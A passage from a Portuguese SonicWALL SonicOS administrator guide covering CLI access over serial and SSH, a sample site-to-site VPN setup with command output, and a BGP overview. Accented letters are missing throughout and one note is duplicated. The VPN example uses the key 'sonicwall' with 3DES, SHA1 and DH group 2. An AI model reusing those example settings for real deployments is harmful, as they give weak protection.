comando restore para redefinir o dispositivo para os padres de fbrica durante uma sesso
de configurao de srie.
Cuidado O comando para restaurar apaga todas as configuraes no dispositivo, deixando-o em um

estado padro de fbrica.
Mtodos de gerenciamento para o dispositivo de segurana de

rede SonicWALL
Voc pode configurar o dispositivo SonicWALL usando um dos trs mtodos:

Uma conexo serial e o gerenciador de configuraes
Uma atribuio de endereo IP no necessria para gerenciamento do dispositivo.
Um dispositivo deve ser gerenciado enquanto se encontrar fisicamente conectado
atravs de um cabo serial.
Interface do usurio baseada no navegador da Web
Um endereo IP deve ter sido atribudo ao dispositivo para gerenciamento ou utilize o
padro 192.168.168.168.
Iniciar uma sesso de gerenciamento utilizando a CLI
Gerenciamento de srie e atribuio de endereo IP

Siga as etapas abaixo para iniciar uma sesso de gerenciamento por meio de uma conexo
serial e configurar um endereo IP para o dispositivo.
Nota As configuraes de terminal padro no SonicWALL e os mdulos constituem 80 colunas

por 25 linhas. Para garantir a melhor exibio e reduzir a possibilidade de anomalias
grficas, use as mesmas configuraes do software de terminal serial. As configuraes de
terminal do dispositivo podem ser alteradas, se necessrio. Use a configurao ANSI
padro no software de terminal serial.
1. Conecte o cabo do modem nulo includo porta do dispositivo marcada com CONSOLE.
Conecte a outra extremidade do cabo do modem nulo a uma porta serial no computador
de configurao.
2. Inicie qualquer aplicativo de emulao de terminal que se comunique com a porta serial
conectada ao dispositivo. Use essas configuraes:
115.200 baud
8 bits de dados
sem paridade
1 bit de parada
sem controle de fluxo
3. Pressione Enter/Return. So exibidas informaes iniciais e, em seguida, um prompt de
NOME DO DISPOSITIVO>.
Iniciar uma sesso de gerenciamento SSH atravs de Ethernet
Nota Esta opo funciona para clientes administrando um dispositivo que no tem um cabo para
acesso do console CLI.
Siga as etapas abaixo para iniciar uma sesso de gerenciamento SSH por meio de uma
conexo Ethernet de um cliente ao dispositivo.
| 1365
1. Conecte um cabo Ethernet porta da interface marcada com XO. Conecte a outra
extremidade do cabo Ethernet a uma porta Ethernet no computador de configurao.
2. Inicie qualquer aplicativo de emulao de terminal (como PuTTY) que se comunique
atravs da interface Ethernet conectada ao dispositivo.
3. No aplicativo de emulao, digite o endereo IP de destino do dispositivo e digite 22 como
o nmero da porta.
4. Selecione SSH como o tipo de conexo e abra uma conexo.
Fazer login na CLI do SonicOS

Quando a conexo for estabelecida, faa login no dispositivo de segurana:
Etapa 1 No prompt de Usurio, digite o nome de usurio do administrador. Somente o usurio

administrador ser capaz de efetuar login na CLI. O nome de usurio padro do administrador
admin. O padro pode ser alterado.
Etapa 2 No prompt de Senha, digite a senha do administrador. Se um nome de usurio ou uma senha
invlido(a) ou no coincidente for inserido(a), o prompt de CLI voltar a Usurio: e a
mensagem de erro "Login de administrador da CLI negado devido a credenciais invlidas" ser
registrada. No existe nenhum recurso de bloqueio na CLI.
Configurar o dispositivo de segurana de rede Dell SonicWALL

Voc pode configurar o dispositivo de segurana de rede Dell SonicWALL usando um dos trs
mtodos:
Configurar recursos usando a CLI em uma conexo serial atravs da porta de console na
pgina 1367
Configurar recursos usando a CLI em uma sesso de gerenciamento SSH atravs de
Ethernet na pgina 1368
Configurar recursos usando a interface de gerenciamento (interface de usurio da Web)
na pgina 1369
Nota Para usar a CLI em uma conexo serial ou em uma sesso de gerenciamento SSH, voc
precisa usar um aplicativo de emulao de terminal (como Tera Term) ou um aplicativo de
cliente SSH (como PuTTY). Voc pode encontrar emuladores de terminal adequados e
gratuitos na Internet.

na pgina 1369
Nota Para usar a CLI em uma conexo serial ou em uma sesso de gerenciamento SSH, voc
precisa usar um aplicativo de emulao de terminal (como Tera Term) ou um aplicativo de
cliente SSH (como PuTTY). Voc pode encontrar emuladores de terminal adequados e
gratuitos na Internet.

Configurar recursos usando a CLI em uma conexo serial atravs da porta de console
No necessrio atribuir um endereo IP ao firewall para usar a CLI em uma conexo serial
na porta de console.
Nota As configuraes de terminal padro no firewall so de 80 colunas por 25 linhas. Para

garantir a melhor exibio e reduzir a possibilidade de anomalias grficas, use as mesmas
configuraes do software de terminal serial. As configuraes de terminal do dispositivo
podem ser alteradas, se necessrio. Use a configurao ANSI padro no software de
terminal serial.
Para configurar recursos usando a CLI em uma conexo serial atravs da porta de console:
Etapa 1 Conecte um cabo serial RJ-45 a DB-9 porta do dispositivo marcada com CONSOLE. Conecte
a outra extremidade do cabo a uma porta serial no computador de configurao.
As atribuies de pinos do cabo serial RJ-45 a DB-9 so as seguintes:
Conector RJ-45 Conector DB-9

Pino 1 Pino 9
Pino 2 Pino 1
Pino 3 Pino 4
Pino 4 Pino 5
Pino 5 Pino 2
Pino 6 Pino 3
Pino 7 Pino 8
| 1367
Pino 8 Pino 7
Pino 6 no usado
O diagrama de pinos do cabo serial RJ-45 a DB-9 mostrado abaixo:
Etapa 2 Inicie um aplicativo de emulao de terminal que se comunique com a porta serial conectada
ao dispositivo. Use essas configuraes:
115.200 baud
8 bits de dados
sem paridade
1 bit de parada
Etapa 3 Pressione Enter/Return. So exibidas informaes iniciais e, em seguida, um prompt de
NOME DO DISPOSITIVO>.
Configurar recursos usando a CLI em uma sesso de gerenciamento SSH atravs de

Ethernet
Voc pode usar um cliente SSH para acessar a CLI conectando-se ao dispositivo com um cabo
Ethernet. Esta opo til para os clientes que no tm acesso a um cabo serial RJ-45 a DB-
9 para a porta de console no firewall.
Para usar o gerenciamento SSH, voc deve atribuir um endereo IP a X0 (LAN) ou X1 (WAN)
ou usar o endereo IP de LAN padro 192.168.168.168.

Para configurar recursos usando a CLI em uma sesso de gerenciamento SSH atravs de
Ethernet:
Etapa 1 Conecte um cabo Ethernet porta da interface marcada com X0. Conecte a outra extremidade
do cabo Ethernet a uma porta Ethernet no computador de configurao.
Etapa 2 Inicie um aplicativo de emulao de terminal ou um cliente SSH que se comunique atravs de
Ethernet.
Etapa 3 No aplicativo de emulao, digite o endereo IP de destino da interface X0 e digite 22 como
o nmero da porta.
Etapa 4 Selecione SSH como o tipo de conexo e abra uma conexo.

Voc pode gerenciar o dispositivo com segurana a partir do seu navegador da Web usando
HTTPS e conectando-se ao endereo IP de LAN ou WAN do dispositivo, diretamente ou
atravs da rede. Consulte o Guia do administrador do SonicOS 6.2 para obter informaes
completas sobre a interface de gerenciamento do SonicOS (interface de usurio da Web).
Existem diversos recursos no SonicOS que no podem ser configurados atravs da CLI. Os
seguintes recursos s podem ser configurados na interface de gerenciamento do SonicOS
(interface de usurio da Web):
Categoria Recursos
Painel Todos os recursos
Sistema Licena, certificados, configuraes (importar, fazer upload/download)
SonicPoint Todos os recursos
Firewall Regras de aplicativos
Configuraes de firewall BWM
DPI-SSL Todos os recursos
Anti-spam Todos os recursos
Usurios Segurana de servios para convidados, contas de convidados, status
de convidados
Servios de segurana Resumo, filtro de contedo, imposio do AV cliente, anti-spyware,
filtro Geo-IP, filtro de botnets
Acelerao de WAN Todos os recursos
AppFlow Todos os recursos
Log Todos os recursos
Modo de segurana
O modo de segurana uma interface de gerenciamento limitado da Web que oferece uma
maneira de fazer upload de firmware a partir de seu computador e reinicializar o dispositivo.
O recurso Modo de segurana permite recuperar rapidamente de estados de configurao
incertos com uma interface de gerenciamento simplificada que inclui as mesmas configuraes
disponveis na pgina Sistema > Configuraes.
Para obter instrues sobre como reiniciar o firewall no modo de segurana, consulte o Guia
de noes bsicas do seu dispositivo.
Nota Voc no pode usar os comandos da CLI no modo de segurana.
| 1369
Exemplo: Configurar uma VPN site a site usando a CLI
Esta seo descreve como criar uma poltica de VPN usando a interface da linha de comando.
Voc pode configurar todos os parmetros utilizando a CLI e ativar a VPN sem usar a interface
de gerenciamento da Web.
Nota Neste exemplo, a poltica de VPN no outro extremo j foi criada.
Acesso CLI
Etapa 1 Use um conector DB-9 a RJ-45 para conectar a porta serial de seu PC porta do console do
seu firewall.
Etapa 2 Usando um programa emulador de terminal (como PuTTY ou Tera Term), use os seguintes
parmetros:
115.200 baud
8 bits
sem paridade
1 bit de parada
Etapa 3 Voc poder precisar clicar em return duas a trs vezes para obter um prompt de comando que
ser semelhante ao seguinte:
NSA3600>
ou
SM9200>
Etapa 4 Se voc j usou outra CLI, como Unix shell ou Cisco IOS, este processo deve ser relativamente
simples e semelhante. Ela tem preenchimento automtico para que voc no tenha de digitar
o comando na totalidade.
Etapa 5 Quando precisar fazer uma alterao na configurao, voc deve estar no modo de
configurao. Para entrar no modo de configurao, digite configure.

NSA3600> configure
(config[NSA3600])>
Etapa 6 O prompt de comando muda e adiciona a palavra config para distinguir do modo normal. Agora
voc pode definir todas as configuraes, habilitar e desabilitar as VPNs e configurar o firewall.

Configurao
Neste exemplo est configurada uma VPN site a site entre dois dispositivos NSA 3600, com
as seguintes configuraes:
NSA 3600 local (casa):
IP de WAN: 10.50.31.150
Sub-rede da LAN: 192.168.61.0
Mscara 255.255.255.0
NSA 3600 remoto (escritrio):

IP de WAN: 10.50.31.104
Sub-rede da LAN: 192.168.15.0
Mscara: 255.255.255.0
Mtodo de autenticao: IKE usando uma chave previamente compartilhada

Troca de fase 1: Modo principal
Criptografia de fase 1: 3DES
Autenticao de fase 1: SHA1
Grupo DH de fase 1: 2
Durao de fase 1: 28800
Protocolo de fase 2: ESP
Criptografia de fase 2: 3DES
Autenticao de fase 2: SHA1
Durao de fase 2: 28800
Sem PFS
Etapa 1 No modo de configurao, crie um objeto de endereo para a rede remota especificando o
nome, a atribuio de zonas, o tipo e o endereo. Neste exemplo, ns utilizamos o nome
OfficeLAN:
(config[NSA3600]> address-object Office LAN
(config-address-object[OfficeLAN])>
Nota O prompt foi alterado para indicar o modo de configurao do objeto de endereo.
(config-address-object[OfficeLAN])> zone VPN

(config-address-object[OfficeLAN])> network 192.168.15.0 255.255.255.0
(config-address-object[OfficeLAN])> finished
Etapa 2 Para exibir o objeto de endereo, digite o comando show address-object [name]:
NSA3600 > show address-object OfficeLAN
O resultado ser semelhante ao seguinte:
address-object OfficeLAN
network 192.168.15.0 255.255.255.0
zone VPN
Etapa 3 Para criar a poltica de VPN, digite o comando:
vpn policy [name] [authentication method]
(config[NSA3600])> vpn policy OfficeVPN pre-shared
(config-vpn[OfficeVPN])>
| 1371
Nota O prompt muda para indicar o modo de configurao da poltica de VPN. Todas as
configuraes relacionadas com esta VPN sero inseridas aqui.
Etapa 4 Configure a chave previamente compartilhada. Neste exemplo, a chave previamente

compartilhada sonicwall:
(config-vpn[OfficeVPN])> pre-shared-secret sonicwall
Etapa 5 Configure o gateway IPsec:
(config-vpn[OfficeVPN])> gw ip-address 10.50.31.104
Etapa 6 Defina as redes local e remota:
(config-vpn[OfficeVPN])> network local address-object "LAN Primary Subnet"
(config-vpn[OfficeVPN])> network remote address-object "OfficeLAN"
Etapa 7 Configure as propostas IKE e IPSec:
(config-vpn[OfficeVPN])> proposal ike main encr triple-des auth sha1 dh 2
lifetime 28800
(config-vpn[OfficeVPN])> proposal ipsec esp encr triple-des auth sha1 dh no
lifetime 28800
Etapa 8 Na guia Avanado na configurao da interface do usurio, habilite a manuteno de atividade
na poltica de VPN:
(config-vpn[OfficeVPN])> advanced keepalive
Etapa 9 Para habilitar a poltica de VPN, use o comando vpn enable [name]:
(config[NSA3600])> vpn enable "OfficeVPN"
Etapa 10 Use o comando "finished" para salvar a poltica de VPN e sair do modo de configurao da
VPN:
(config-vpn[OfficeVPN])> finished
(config[NSA3600])>
A configurao est concluda.
Nota O prompt de comando retorna ao prompt do modo de configurao.

Exibir uma configurao de VPN
Para exibir uma lista de todas as polticas de VPN configuradas:
Etapa 1 Digite o comando show vpn policy. O resultado ser semelhante ao seguinte:
(config[NSA3600])> show vpn policy
Poltica: VPN de grupo WAN (desabilitada)
Modo de chave: Previamente compartilhada
Segredo previamente compartilhado: DE65AD2228EED75A
Propostas:
IKE: Modo agressivo, 3DES SHA, Grupo 2 DH, 28.800 segundos
IPSEC: ESP, 3DES SHA, sem PFS, 28.800 segundos
Avanado:
Permitir NetBIOS DESLIGADO, Permitir difuso seletiva DESLIGADA
Gerenciamento: HTTP DESLIGADO, HTTPS DESLIGADO
GW de LAN padro: 0.0.0.0
Requer XAUTH: LIGADO, Grupo de usurios: Usurios confiveis
Cliente:
Configuraes XAUTH de cache: Nunca
Configuraes do adaptador virtual: Nenhum
Permitir conexes com: Tneis de diviso
Definir Rota padro para DESLIGADO, Aplicar lista de controle de acesso de VPN para
DESLIGADO
Requer GSC DESLIGADO
Usar chave padro DESLIGADO
Poltica: VPN de escritrio (habilitada)
GW primrio: 10.50.31.104
GW secundrio: 0.0.0.0
Segredo previamente compartilhado: sonicwall
ID IKE:
Local: Endereo IP
Par: Endereo IP
Rede:
Local: Sub-rede primria de LAN
Remoto: LAN de escritrio
Propostas:
IKE: Modo principal, 3DES SHA, Grupo 2 DH, 28.800 segundos
Avanado:
Manuteno de atividade LIGADA, Adicionar regra automtica LIGADO, Permitir NetBIOS
DESLIGADO
Permitir difuso seletiva DESLIGADO
Gerenciamento: HTTP LIGADO, HTTPS LIGADO
Login do usurio: HTTP LIGADO, HTTPS LIGADO
| 1373
Requer XAUTH: DESLIGADO
Vinculado a: Zona WAN
Etapa 2 Para exibir a configurao de uma poltica especfica, especifique o nome da poltica entre
aspas duplas.
Por exemplo:
(config[NSA3600])> show vpn policy "OfficeVPN"
O resultado ser semelhante ao seguinte:
Poltica: VPN de escritrio (habilitada)
GW primrio: 10.50.31.104
GW secundrio: 0.0.0.0
Segredo previamente compartilhado: sonicwall
ID IKE:
Local: Endereo IP
Par: Endereo IP
Rede:
Local: Sub-rede primria de LAN
Remoto: LAN de escritrio
Propostas:
IKE: Modo principal, 3DES SHA, Grupo 2 DH, 28.800 segundos
Avanado:
Manuteno de atividade LIGADA, Adicionar regra automtica LIGADO, Permitir NetBIOS
DESLIGADO
Permitir difuso seletiva DESLIGADO
Gerenciamento: HTTP LIGADO, HTTPS LIGADO
Login do usurio: HTTP LIGADO, HTTPS LIGADO
Requer XAUTH: DESLIGADO
Vinculado a: Zona WAN
Etapa 3 Digite o comando show vpn sa [name] para ver o SA ativo:
(config[NSA3600])> show vpn sa "OfficeVPN"
Poltica: OfficeVPN
SAs de IKE
GW: 10.50.31.150:500 --> 10.50.31.104:500
Modo principal, 3DES SHA, Grupo 2 DH, Respondente
Cookie: 0x0ac298b6328a670b (I), 0x28d5eec544c63690 (R)
Durao: 28.800 segundos (28.783 segundos restantes)
SAs de IPsec
GW: 10.50.31.150:500 --> 10.50.31.104:500
(192.168.61.0 192.168.61.255) --> (192.168.15.0 192.168.15.255)
ESP, 3DES SHA, SPI 0xed63174f de entrada, SPI 0x5092a0b2 de sada
Durao: 28.800 segundos (28.783 segundos restantes)

Apndice B
Roteamento avanado do BGP
Roteamento avanado do BGP

Este apndice fornece uma viso geral sobre a implementao do Border Gateway Protocol
(BGP), como funciona e como configur-lo para a sua rede.
Este apndice contm as seguintes sees:
Viso geral do BGP na pgina 1375
Avisos na pgina 1382
Configurar o BGP na pgina 1383
Verificar a configurao do BGP na pgina 1394
BGP IPv6 na pgina 1397
Termos de BGP na pgina 1418
Viso geral do BGP

As sees seguintes fornecem uma viso geral do BGP:
O que o BGP? na pgina 1375
Informaes adicionais na pgina 1376
Sistemas autnomos na pgina 1377
Tipos de topologias de BGP na pgina 1377
Por que usar o BGP? na pgina 1378
Como funciona o BGP? na pgina 1378
O que o BGP?
BGP um protocolo de roteamento em grande escala usado para comunicar informaes de
roteamento entre sistemas autnomos (ASs), os quais so domnios de rede bem definidos e
administrados separadamente. O suporte de BGP permite que dispositivos de segurana da
SonicWALL substituam um roteador BGP tradicional no limite do AS de uma rede. A
implementao atual de BGP da SonicWALL mais adequada para ambientes de "provedor
nico/hospedagem nica", onde a rede utiliza um ISP como o seu provedor de Internet e tem
uma nica conexo a esse provedor. O BGP da SonicWALL tambm capaz de suportar
ambientes de "provedor nico/hospedagem mltipla", onde a rede utiliza um nico ISP, mas
tem um pequeno nmero de rotas separadas para o provedor. O BGP habilitado na pgina
Rede > Roteamento da GUI do SonicOS e, em seguida, totalmente configurado atravs da
interface de linha de comando (CLI) SonicOS.
| 1375
Os requisitos de licenciamento do BGP so mostrados na tabela abaixo.
Plataforma Licena adicional necessria

NSA 2600 SonicOS Expanded
NSA 3600 SonicOS expandido 01-SSC-7091
NSA 4600 Nenhum; BGP includo.
SM 9200 Nenhum; BGP includo.
Nota O BGP compatvel com o NSA 2600 e NSA 3600 com a aquisio de uma licena
expandida do SonicOS. As licenas podem ser adquiridas em www.mysonicwall.com.
Informaes adicionais
Os protocolos de roteamento no so apenas pacotes transmitidos atravs de uma rede, mas
incluem todos os mecanismos atravs dos quais roteadores e grupos de roteadores
descobrem, organizam e comunicam topologias de rede. Os protocolos de roteamento usam
algoritmos distribudos que dependem de cada participante que segue o protocolo tal como
especificado e so muito teis quando as rotas em um domnio de rede mudam
dinamicamente, uma vez que as ligaes entre ns de rede mudam o estado.
Os protocolos de roteamento normalmente interagem com dois bancos de dados:
Base de informaes de roteamento (RIB) utilizado para armazenar todas as
informaes de rota requeridas pelos prprios protocolos de roteamento.
Base de informaes de encaminhamento (FIB) utilizado para encaminhamento de
pacotes.
As melhores rotas escolhidas na RIB so usadas para preencher a FIB. A RIB e a FIB mudam
dinamicamente, uma vez que as atualizaes de roteamento so recebidas por cada protocolo
de roteamento, ou a conectividade no dispositivo muda.
Existem duas classes bsicas de protocolos de roteamento:
Protocolos de gateway interior (IGPs) os protocolos de gateway interior so protocolos
de roteamento concebidos para comunicar rotas em redes que existem dentro de um AS.
Existem duas geraes de IGPs. A primeira gerao consiste em protocolos de vetor de
distncia. A segunda gerao consiste em protocolos de estado de ligaes. Os protocolos
de vetor de distncia so relativamente simples, mas tm problemas quando so
dimensionados para um grande nmero de roteadores. Os protocolos de estado de
ligaes so mais complexos, mas tm uma capacidade de dimensionamento melhor. Os
protocolos existentes de vetor de distncia so o IGRP (Interior Gateway Routing Protocol
Protocolo de roteamento de gateway interior), o EIGRP (Enhanced Interior Gateway
Routing Protocol Protocolo de roteamento de gateway interior aprimorado), o RIP
(Routing Information Protocol Protocolo de informaes de roteamento) e o RIPv2, uma
verso aprimorada do RIP. IGRP e EIGRP so protocolos da Cisco. Os protocolos de
estado de ligaes em uso no momento so os protocolos OSPF (Open Shortest Path First
Abrir o caminho mais curto primeiro) e IS-IS (Intermediate System to Intermediate
System Sistema intermedirio para sistema intermedirio).

O SonicOS suporta os protocolos OSPFv2 e RIPv1/v2 (os dois protocolos de gateway
interior de roteamento mais comuns), permitindo que os nossos clientes usem os nossos
produtos nas suas redes IGP e evitem o custo adicional de um roteador tradicional
separado.
Protocolos de gateway exterior (EGPs) o protocolo de gateway exterior padro e
generalizado o BGP (BGP4, para maior exatido). O BGP um protocolo de roteamento
em grande escala que comunica informaes e polticas de roteamento entre domnios de
rede bem definidos denominados sistemas autnomos (ASs). Um sistema autnomo um
domnio de rede administrado separadamente, independente de outros sistemas
autnomos. O BGP usado para transmitir rotas e polticas de rotas entre sistemas
autnomos. Os ISPs usam frequentemente o BGP para transmitir rotas e polticas de rotas
para os seus clientes, bem como para outros ISPs.
Cada sistema autnomo tem um nmero de 16 bits atribudo. Tal como acontece com os
endereos IP, o nmero de um AS pode ser pblico ou privado. Nmeros de AS pblicos
so um recurso limitado e no so fornecidos com base em vrios fatores. Os clientes de
ISP com redes grandes de hospedagem mltipla para dois ou mais ISPs normalmente tm
um AS pblico, enquanto os clientes com redes menores tero um AS privado
administrado pelo seu ISP.
Como os nossos produtos evoluem para suportar os requisitos ao nvel corporativo, alguns
clientes podero desejar colocar os nossos produtos no limite do seu AS, em vez de um
roteador tradicional de BGP.
Sistemas autnomos
Cada sistema autnomo tem um nmero de 16 bits atribudo. Tal como acontece com os
endereos IP, o nmero de um AS pode ser pblico ou privado. Nmeros de AS pblicos so
um recurso limitado e no so fornecidos com base em vrios fatores. Os clientes de ISP com
redes grandes de hospedagem mltipla para dois ou mais ISPs normalmente tm um AS
pblico, enquanto os clientes com redes menores tero um AS privado administrado pelo seu
ISP.
Tipos de topologias de BGP

O BGP um protocolo de roteamento muito flexvel e complexo. Como tal, os roteadores de
BGP podem ser colocados em uma grande variedade de configuraes de topologias, como
roteadores de ncleo da Internet, roteadores de ISP intermedirios, equipamentos nas
instalaes do cliente (CPE) de ISP ou roteadores em pequenas redes privadas de BGP. O
nmero de rotas de BGP necessrio para diferentes topologias varia entre um valor superior a
300.000 para roteadores de ncleo e 0 para os clientes de ISP que usam um nico ISP e usam
roteamento padro para todos os destinos fora de seu AS. frequentemente necessrio que
os clientes de ISP executem o BGP do roteador do limite (CPE) ao ISP, independentemente
do nmero de rotas que recebem do ISP. Isso permite que os clientes de ISP controlem as
redes que desejam anunciar ao mundo externo. Existe sempre o medo de que um cliente
anuncie uma rede ou rede agregada que no lhe pertena, criando um buraco negro no trfego
da Internet para essas redes. Na realidade, os provedores ISP so cuidadosos a filtrar
propagandas invlidas de seus clientes (um dos pontos fortes do BGP), por isso esta situao
raramente acontece.
Existem trs escalas bsicas de redes de BGP:
Provedor nico/hospedagem nica a rede recebe uma rota nica (hospedagem nica)
a partir de um ISP nico (provedor nico). O nmero de rotas que um cliente de ISP recebe
do respectivo ISP depende da natureza de seu AS. Um cliente de ISP que usa apenas um
ISP como provedor de Internet e possui uma conexo nica a esse provedor (provedor
| 1377
nico/hospedagem nica) no precisa receber quaisquer rotas, pois todo o trfego
destinado para fora do AS ir para o respectivo ISP. Esses clientes ainda podem anunciar
algumas ou todas as suas redes internas ao ISP.
Provedor nico/hospedagem mltipla a rede recebe rotas mltiplas (hospedagem
mltipla) de um nico ISP (provedor nico). Os clientes de ISP que usam um nico ISP,
mas tm mltiplas conexes ao ISP, podem receber apenas a rota padro (0.0.0.0/0) em
cada gateway do ISP. Se uma conexo ao ISP falhar, a rota padro anunciada enviada do
roteador CPE conectado para roteadores internos ser retirada e o trfego da Internet fluir
ento para um roteador CPE que tem conectividade com o ISP. A rede interna do cliente
tambm ser anunciada ao ISP em cada gateway de roteador CPE, permitindo que o ISP
use caminhos alternativos se uma conexo especfica para um cliente falhar.
Provedor mltiplo/hospedagem mltipla os clientes de ISP que usam mais de um ISP
(provedor mltiplo/hospedagem mltipla) tm um ou mais roteadores de gateway
separados para cada ISP. Nesse caso, o AS do cliente deve ser um AS pblico e poder
ser um AS de trnsito ou no de trnsito. Um AS de trnsito receber e encaminhar o
trfego de um ISP destinado a uma rede acessvel por meio de outro ISP (o destino do
trfego no se encontra no AS do cliente). Um AS no de trnsito s dever receber trfego
destinado ao respectivo AS e o restante trfego ser descartado. Os roteadores de BGP
em um AS de trnsito recebem frequentemente uma grande quantidade (em muitos casos
toda a quantidade) da tabela de encaminhamento de BGP completa de cada ISP.
Por que usar o BGP?

Mesmo que voc no tenha uma rede grande na Internet, o BGP o padro para
hospedagem mltipla, balanceamento de carga e redundncia:
Provedor nico/hospedagem nica no normalmente um forte candidato ao
BGP, mas pode ainda us-lo para anunciar redes ao ISP. As redes de hospedagem
nica no so elegveis para um AS pblico de RIRs.
Provedor nico/hospedagem mltipla comum seguir a sugesto de RFC2270
para usar um AS privado nico (64512 a 65535) para obter o benefcio de BGP
preservando o ASN pblico.
Provedor mltiplo/hospedagem mltipla altamente redundante, normalmente com
roteadores dedicados para cada ISP. Requer ASN pblico. Grande volume de memria
O resumo da rota torna o roteamento escalvel.
Como funciona o BGP?

O BGP utiliza a porta TCP 179 para comunicao. O BGP considerado um protocolo de vetor
de caminho, contendo descries de destinos de caminho completo. Os vizinhos do BGP
podem ser internos (iBGP) ou externos (eBGP):
iBGP o vizinho encontra-se no mesmo AS.
eBGP o vizinho encontra-se em um AS diferente.
Os caminhos so anunciados em mensagens de ATUALIZAO que so marcadas com vrios
atributos de caminho. AS_PATH e NEXT_HOP so os dois atributos mais importantes que
descrevem o caminho de uma rota em uma mensagem de atualizao de BGP.
AS_PATH: Indica aos ASs que a rota est viajando de uma determinada origem para um
determinado destino. No exemplo abaixo, o AS_PATH proveniente do AS 7675 para o AS
12345. Relativamente ao BGP interno, o AS_PATH especifica o mesmo AS para a origem
e para o destino.

NEXT_HOP: Indica o endereo IP do roteador seguinte para o qual o caminho viaja. Os
caminhos anunciados nos limites do AS herdam o endereo NEXT_HOP do roteador de
limite. O BGP depende dos protocolos de roteamento internos para chegar aos endereos
NEXT_HOP.
Mquina de estado finito de BGP
O RFC 1771, que define o BGP, descreve a operao do BGP em termos da mquina de
estado seguinte. A tabela a seguir ao diagrama apresenta informaes adicionais sobre os
vrios estados.
| 1379
Figura 28 Mquina de estado finito de BGP
Estado Descrio
Ocioso Aguardando o evento de incio, aps estabelecer uma nova sesso de BGP ou redefinir
uma sesso existente. Em caso de erros, volta ao estado Ocioso. Aps o evento de
incio, o BGP inicializa, redefine o temporizador de repetio de conexo, inicia a
conexo de transporte TCP e espera por conexes
Conectar Assim que a camada TCP estiver ativa, ocorre a transio para OpenSent e enviado
ABRIR. Se no existir nenhum TCP, ocorre a transio para Ativo. Se o temporizador de
repetio de conexo expirar, permanece em Conectar, redefine o temporizador e inicia
uma conexo de transporte. Caso contrrio, a transio volta a Ocioso.
Ativo Tenta estabelecer uma conexo TCP com um par. Se a conexo for bem-sucedida,
ocorre a transio para OpenSent e enviado ABRIR. Se a repetio da conexo
expirar, reinicia o temporizador e volta ao estado Conectar. Tambm espera ativamente
pela conexo de outro par. Volta a Ocioso no caso de outros eventos.
A conexo oscilao Ativo indica um problema no transporte TCP, por exemplo,
retransmisses de TCP ou inacessibilidade de um par.
OpenSent Aguardando ABRIR mensagem do par. Valida no recebimento. Em caso de falha na
validao, envia NOTIFICAO e fica Ocioso. Em caso de sucesso, envia
MANUTENO DE ATIVIDADE e redefine o temporizador de manuteno de atividade.
Negocia o tempo de espera; o menor valor ganha. Se for zero, o temporizador de tempo
de espera e o temporizador de manuteno de atividade no so reiniciados.
OpenConfirm Aguarda por MANUTENO DE ATIVIDADE ou NOTIFICAO. Se for recebida
MANUTENO DE ATIVIDADE, ocorre a transio para Estabelecido. Se for recebida
ATUALIZAR ou MANUTENO DE ATIVIDADE, reinicia o temporizador de tempo de
espera (a menos que o tempo de espera negociado seja zero). Se for recebida
NOTIFICAO, ocorre a transio para Ocioso.
So enviadas mensagens peridicas de MANUTENO DE ATIVIDADE. Se a camada
TCP quebrar, ocorre a transio para Ocioso. Se ocorrer um erro, envia uma
NOTIFICAO com o cdigo de erro e ocorre a transio para Ocioso.
Estabelecido Sesso ativada, troca atualizaes com pares. Se for recebida NOTIFICAO, ocorre a
transio para Ocioso. As atualizaes so verificadas quanto existncia de erros. Em
caso de erro, envia NOTIFICAO e ocorre a transio para Ocioso. Em caso
expirao do tempo de espera, desconecta o TCP.

Mensagens de BGP
A comunicao de BGP inclui os seguintes tipos de mensagens:

Abrir a primeira mensagem entre os pares de BGP aps o estabelecimento da sesso
TCP. Contm as informaes necessrias para estabelecer uma sesso de troca de
trfego, por exemplo, ASN, tempo de espera e recursos como extenses de vrios
produtos e atualizao de rota.
Atualizar essas mensagens contm informaes de caminho, como avisos de rota ou
retiradas.
Keepalive mensagens peridicas para manter a camada TCP ativa e para anunciar a
atividade.
Notificao uma solicitao para terminar a sesso de BGP. Notificaes no fatais
contm o cdigo de erro "cease" (cessar). Os subcdigos fornecem mais detalhes:
Subcdigo Descrio
1 O nmero mximo de prefixos atingidos O valor configurado de "prefixo mximo de vizinho"
foi excedido
2 Desligamento administrativamente A sesso foi administrativamente desligada
3 Par no configurado A configurao do par foi removida
4 Redefinio administrativamente A sesso foi administrativamente redefinida
5 Conexo rejeitada Rejeio (por vezes temporria) da sesso de BGP
6 Outras alteraes de configurao A sesso foi administrativamente redefinida por
algum motivo
Atualizao de rota uma solicitao para o par reenviar as suas rotas.
Atributos de BGP
As mensagens de atualizao de BGP podem incluir os seguintes atributos:
Valor Cdigo
1 ORIGIN
2 AS_PATH
3 NEXT_HOP
4 MULTI_EXIT_DISC
5 LOCAL_PREF
6 ATOMIC_AGGREGATE
7 AGGREGATOR
8 COMMUNITY
9 ORIGINATOR_ID
10 CLUSTER_LIST
11 DPA
12 ADVERTISER (histrico)
13 RCID_PATH / CLUSTER_ID (histrico)
| 1381
Valor Cdigo
14 MP_REACH_NLRI
15 MP_UNREACH_NLRI
16 EXTENDED COMMUNITIES
17 AS4_PATH
18 AS4_AGGREGATOR
19 Atributo especfico SAFI (SSA) (substitudo)
20 Atributo de conector (substitudo)
21 AS_PATHLIMIT (substitudo)
22 PMSI_TUNNEL
23 Atributo de encapsulamento de tnel
24 Engenharia de trfego
25 Comunidade alargada especfica de endereo IPv6
26 AIGP (TEMPORRIO expira em 23-02-2011)
27-254 No atribudo
255 Reservado para desenvolvimento
Para obter mais informaes sobre os atributos de BGP, consulte: http://www.iana.org/

assignments/bgp-parameters/bgp-parameters.xml
Avisos
Escala atualmente o SonicOS oferece suporte de rotas baseadas em polticas (PBRs)
de 512 a 2048. Isso no suficiente para a totalidade ou mesmo parte das tabelas de
roteamento. O nmero de rotas que existe na RIB poder ser superior ao nmero instalado
na PBR (que a FIB). Isso ocorre quando vrias rotas concorrentes foram recebidas
atravs de protocolos de roteamento. Para cada caso em que a RIB contm rotas
concorrentes rotas em um destino de rede especfico, apenas uma dessas rotas
escolhida para ser instalada na FIB.
Atualmente, a nossa implementao mais adequada para os clientes de provedor nico/
hospedagem nica. As instalaes de provedor nico/hospedagem mltipla tambm
podero ser adequadas quando a rota padro est sendo recebida pelo ISP ou quando um
nmero muito pequeno de rotas especficas de ISP recebido pelo cliente. A ltima
situao permite que roteadores internos optem pelo caminho ideal para destinos fora do
AS, mas ainda no domnio da rede do ISP (isto denominado rotas parciais).
Balanceamento de carga no existe atualmente suporte para mltiplos caminhos no
